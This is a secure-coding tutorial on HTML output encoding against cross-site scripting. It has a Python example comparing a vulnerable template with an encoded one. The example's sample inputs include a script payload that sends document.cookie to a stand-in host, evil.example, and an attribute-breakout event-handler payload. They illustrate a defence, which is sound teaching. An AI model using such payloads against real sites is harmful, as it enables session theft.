- HTML encoding (output encoding for the HTML context) stops attacker-controlled data from being interpreted as markup or script when the browser parses the page
- Untrusted values (user input, URL parameters, database fields) should be validated on input and then HTML-encoded at the point where they are written into the page; validation alone does not make output safe
- Encoding the characters that delimit tags and attributes (&, <, >, " and ') prevents injected HTML and JavaScript from being parsed as code, which protects against cross-site scripting (XSS)
- User data written into a page without HTML encoding allows markup injection: the data becomes part of the document structure instead of being shown as text
- HTML encoding replaces these characters with HTML entities: the string <script> is sent to the browser as &lt;script&gt;, which the browser displays as the literal text <script> instead of executing a script element. The encoding must match the output context (HTML body and quoted attribute values here); data placed inside JavaScript, CSS or a URL needs the encoder for that context

Vulnerable and Secure Code for HTML Encoding
Vulnerable Code
- The given code requests input from the user and writes it straight into the generated HTML
- The code behaves correctly when the user supplies benign input such as a plain name
- Because the input is neither validated nor HTML-encoded before output, input containing markup (for example a script element) is rendered as HTML and the code is vulnerable to XSS

Secure Code
- The given code ensures the HTML-significant characters are converted to their entities before the value reaches the page
- Each character of the untrusted string is passed through the encoding function at output time, so every tag-delimiting character is replaced and the value is displayed as text

Vulnerable Code
- The given code requests input from the user and writes it into the response without encoding
- The code behaves correctly when the user supplies benign input
- Because the input is neither validated nor HTML-encoded before output, input containing markup is interpreted by the browser and the code is vulnerable to XSS

Secure Code
- The given code uses the OWASP ESAPI Encoder.encodeForHTML() method (ESAPI.encoder().encodeForHTML(data)) to encode the data before it is displayed as HTML, so the untrusted value is shown as text rather than parsed as markup
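The vulnerable and secure code described in the two pairs above is not reproduced on this page, so the following is an added example (not the page's code and not the ESAPI library's code) that shows the same idea in Python: a per-character HTML encoder next to a template that writes user input straight into the markup. The function, variable and sample-input names are this example's own, and the malicious input is constructed for the demonstration. The hand-written table covers the five characters that delimit tags and attributes; ESAPI's Java encoder encodes a much broader character set, but the principle (encode at output time, for the HTML context) is the same.

```python
"""HTML output encoding: vulnerable vs. encoded rendering of untrusted input.

Added example, not from the original page. All inputs below are constructed.
"""
import html

# The characters that let data break out of an HTML text node or a quoted
# attribute value. Mapping each to an entity is the whole technique.
HTML_ENTITY_MAP = {
    "&": "&amp;",   # must be first conceptually: it starts every entity
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
}


def encode_for_html(value: str) -> str:
    """Encode an untrusted string for the HTML body / quoted-attribute context.

    Every character is passed through the table one at a time; characters not
    in the table are harmless in this context and pass through unchanged.
    Call this exactly once on the raw value: encoding an already-encoded
    string turns "&lt;" into "&amp;lt;", which displays as the text "&lt;".
    """
    return "".join(HTML_ENTITY_MAP.get(ch, ch) for ch in value)


def render_vulnerable(username: str) -> str:
    """Vulnerable: untrusted input is concatenated straight into the markup."""
    return "<p>Welcome, " + username + "!</p>"


def render_secure(username: str) -> str:
    """Secure: same template, but the value is HTML-encoded at output time."""
    return "<p>Welcome, " + encode_for_html(username) + "!</p>"


def render_secure_attribute(username: str) -> str:
    """Secure for a quoted attribute value: quotes are encoded too, so the
    input cannot close the attribute and add new ones (e.g. onmouseover)."""
    return '<input name="user" value="' + encode_for_html(username) + '">'


def contains_live_tag(rendered: str, tag: str = "script") -> bool:
    """Check whether the rendered page still contains an unencoded tag."""
    return ("<" + tag).lower() in rendered.lower()


def matches_stdlib(value: str) -> bool:
    """Cross-check: html.escape(..., quote=True) encodes the same five characters."""
    return encode_for_html(value) == html.escape(value, quote=True)


# Constructed sample inputs (not taken from the page).
BENIGN_INPUT = "alice"
MALICIOUS_INPUT = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'
ATTRIBUTE_BREAKOUT = '" onmouseover="alert(1)'

if __name__ == "__main__":
    for label, value in (("benign", BENIGN_INPUT), ("malicious", MALICIOUS_INPUT)):
        print(label, "vulnerable:", render_vulnerable(value))
        print(label, "secure:    ", render_secure(value))
    print("attribute:", render_secure_attribute(ATTRIBUTE_BREAKOUT))
```

In the vulnerable rendering the malicious input arrives at the browser as a real script element; in the secure rendering the same bytes arrive as &lt;script&gt;... and are displayed verbatim. The attribute variant shows why the double quote must be in the table: without it the input above would close value="" and add an event handler.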
